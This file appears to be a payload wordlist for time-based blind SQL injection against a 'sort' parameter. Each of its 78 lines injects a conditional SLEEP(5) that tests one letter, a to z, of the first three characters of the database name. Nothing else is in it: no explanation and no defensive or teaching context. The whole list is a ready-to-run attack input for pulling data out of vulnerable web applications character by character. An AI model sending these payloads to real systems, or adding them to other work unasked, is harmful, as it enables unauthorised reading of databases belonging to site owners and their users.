sort=1 AND IF(substring(database(), 1, 1)='a', SLEEP(5), 1)--
sort=1 AND IF(substring(database(), 1, 1)='b', SLEEP(5), 1)--
sort=1 AND IF(substring(database(), 1, 1)='c', SLEEP(5), 1)--
sort=1 AND IF(substring(database(), 1, 1)='d', SLEEP(5), 1)--
sort=1 AND IF(substring(database(), 1, 1)='e', SLEEP(5), 1)--
sort=1 AND IF(substring(database(), 1, 1)='f', SLEEP(5), 1)--
sort=1 AND IF(substring(database(), 1, 1)='g', SLEEP(5), 1)--
sort=1 AND IF(substring(database(), 1, 1)='h', SLEEP(5), 1)--
sort=1 AND IF(substring(database(), 1, 1)='i', SLEEP(5), 1)--
sort=1 AND IF(substring(database(), 1, 1)='j', SLEEP(5), 1)--
sort=1 AND IF(substring(database(), 1, 1)='k', SLEEP(5), 1)--
sort=1 AND IF(substring(database(), 1, 1)='l', SLEEP(5), 1)--
sort=1 AND IF(substring(database(), 1, 1)='m', SLEEP(5), 1)--
sort=1 AND IF(substring(database(), 1, 1)='n', SLEEP(5), 1)--
sort=1 AND IF(substring(database(), 1, 1)='o', SLEEP(5), 1)--
sort=1 AND IF(substring(database(), 1, 1)='p', SLEEP(5), 1)--
sort=1 AND IF(substring(database(), 1, 1)='q', SLEEP(5), 1)--
sort=1 AND IF(substring(database(), 1, 1)='r', SLEEP(5), 1)--
sort=1 AND IF(substring(database(), 1, 1)='s', SLEEP(5), 1)--
sort=1 AND IF(substring(database(), 1, 1)='t', SLEEP(5), 1)--
sort=1 AND IF(substring(database(), 1, 1)='u', SLEEP(5), 1)--
sort=1 AND IF(substring(database(), 1, 1)='v', SLEEP(5), 1)--
sort=1 AND IF(substring(database(), 1, 1)='w', SLEEP(5), 1)--
sort=1 AND IF(substring(database(), 1, 1)='x', SLEEP(5), 1)--
sort=1 AND IF(substring(database(), 1, 1)='y', SLEEP(5), 1)--
sort=1 AND IF(substring(database(), 1, 1)='z', SLEEP(5), 1)--
sort=1 AND IF(substring(database(), 2, 1)='a', SLEEP(5), 1)--
sort=1 AND IF(substring(database(), 2, 1)='b', SLEEP(5), 1)--
sort=1 AND IF(substring(database(), 2, 1)='c', SLEEP(5), 1)--
sort=1 AND IF(substring(database(), 2, 1)='d', SLEEP(5), 1)--
sort=1 AND IF(substring(database(), 2, 1)='e', SLEEP(5), 1)--
sort=1 AND IF(substring(database(), 2, 1)='f', SLEEP(5), 1)--
sort=1 AND IF(substring(database(), 2, 1)='g', SLEEP(5), 1)--
sort=1 AND IF(substring(database(), 2, 1)='h', SLEEP(5), 1)--
sort=1 AND IF(substring(database(), 2, 1)='i', SLEEP(5), 1)--
sort=1 AND IF(substring(database(), 2, 1)='j', SLEEP(5), 1)--
sort=1 AND IF(substring(database(), 2, 1)='k', SLEEP(5), 1)--
sort=1 AND IF(substring(database(), 2, 1)='l', SLEEP(5), 1)--
sort=1 AND IF(substring(database(), 2, 1)='m', SLEEP(5), 1)--
sort=1 AND IF(substring(database(), 2, 1)='n', SLEEP(5), 1)--
sort=1 AND IF(substring(database(), 2, 1)='o', SLEEP(5), 1)--
sort=1 AND IF(substring(database(), 2, 1)='p', SLEEP(5), 1)--
sort=1 AND IF(substring(database(), 2, 1)='q', SLEEP(5), 1)--
sort=1 AND IF(substring(database(), 2, 1)='r', SLEEP(5), 1)--
sort=1 AND IF(substring(database(), 2, 1)='s', SLEEP(5), 1)--
sort=1 AND IF(substring(database(), 2, 1)='t', SLEEP(5), 1)--
sort=1 AND IF(substring(database(), 2, 1)='u', SLEEP(5), 1)--
sort=1 AND IF(substring(database(), 2, 1)='v', SLEEP(5), 1)--
sort=1 AND IF(substring(database(), 2, 1)='w', SLEEP(5), 1)--
sort=1 AND IF(substring(database(), 2, 1)='x', SLEEP(5), 1)--
sort=1 AND IF(substring(database(), 2, 1)='y', SLEEP(5), 1)--
sort=1 AND IF(substring(database(), 2, 1)='z', SLEEP(5), 1)--
sort=1 AND IF(substring(database(), 3, 1)='a', SLEEP(5), 1)--
sort=1 AND IF(substring(database(), 3, 1)='b', SLEEP(5), 1)--
sort=1 AND IF(substring(database(), 3, 1)='c', SLEEP(5), 1)--
sort=1 AND IF(substring(database(), 3, 1)='d', SLEEP(5), 1)--
sort=1 AND IF(substring(database(), 3, 1)='e', SLEEP(5), 1)--
sort=1 AND IF(substring(database(), 3, 1)='f', SLEEP(5), 1)--
sort=1 AND IF(substring(database(), 3, 1)='g', SLEEP(5), 1)--
sort=1 AND IF(substring(database(), 3, 1)='h', SLEEP(5), 1)--
sort=1 AND IF(substring(database(), 3, 1)='i', SLEEP(5), 1)--
sort=1 AND IF(substring(database(), 3, 1)='j', SLEEP(5), 1)--
sort=1 AND IF(substring(database(), 3, 1)='k', SLEEP(5), 1)--
sort=1 AND IF(substring(database(), 3, 1)='l', SLEEP(5), 1)--
sort=1 AND IF(substring(database(), 3, 1)='m', SLEEP(5), 1)--
sort=1 AND IF(substring(database(), 3, 1)='n', SLEEP(5), 1)--
sort=1 AND IF(substring(database(), 3, 1)='o', SLEEP(5), 1)--
sort=1 AND IF(substring(database(), 3, 1)='p', SLEEP(5), 1)--
sort=1 AND IF(substring(database(), 3, 1)='q', SLEEP(5), 1)--
sort=1 AND IF(substring(database(), 3, 1)='r', SLEEP(5), 1)--
sort=1 AND IF(substring(database(), 3, 1)='s', SLEEP(5), 1)--
sort=1 AND IF(substring(database(), 3, 1)='t', SLEEP(5), 1)--
sort=1 AND IF(substring(database(), 3, 1)='u', SLEEP(5), 1)--
sort=1 AND IF(substring(database(), 3, 1)='v', SLEEP(5), 1)--
sort=1 AND IF(substring(database(), 3, 1)='w', SLEEP(5), 1)--
sort=1 AND IF(substring(database(), 3, 1)='x', SLEEP(5), 1)--
sort=1 AND IF(substring(database(), 3, 1)='y', SLEEP(5), 1)--
sort=1 AND IF(substring(database(), 3, 1)='z', SLEEP(5), 1)--